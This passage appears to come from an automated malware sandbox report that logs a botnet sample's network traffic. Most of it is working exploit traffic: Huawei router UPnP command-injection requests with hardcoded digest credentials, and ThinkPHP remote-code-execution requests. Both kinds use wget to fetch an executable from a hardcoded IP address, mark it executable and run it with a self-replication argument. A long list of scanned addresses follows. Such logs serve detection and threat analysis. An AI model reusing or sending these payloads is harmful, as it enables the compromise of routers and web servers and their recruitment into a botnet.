2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.164.78.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.70.47.135
                      Source: unknownTCP traffic detected without corresponding DNS query: 31.226.75.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.57.175.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 186.23.77.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.112.26.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.244.153.74
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.23.105.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 75.49.195.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.206.89.130
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.98.242.170
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.153.42.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 120.191.233.247
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.48.133.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.42.169.126
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.185.62.167
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.233.53.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 141.199.59.173
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.156.206.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 211.45.136.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.164.23.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 181.89.181.103
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.184.79.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.209.199.16
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.52.105.112
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.22.107.208
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.165.255.30
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.14.174.37
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.28.13.220
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.122.250.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.93.186.26
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.176.218.10
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.219.134.66
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.38.240.133
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.33.158.151
                      Source: unknownTCP traffic detected without corresponding DNS query: 24.82.183.93
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.183.5.146
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.248.125.74
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.58.89.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.247.46.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.248.234.133
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.152.207.21
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.50.11.183
                      Source: unknownTCP traffic detected without corresponding DNS query: 133.28.220.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.70.140.218
                      Source: unknownTCP traffic detected without corresponding DNS query: 157.198.219.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.41.190.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.44.111.34
                      Source: unknownTCP traffic detected without corresponding DNS query: 41.146.165.184
                      Source: unknownTCP traffic detected without corresponding DNS query: 197.153.130.241
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
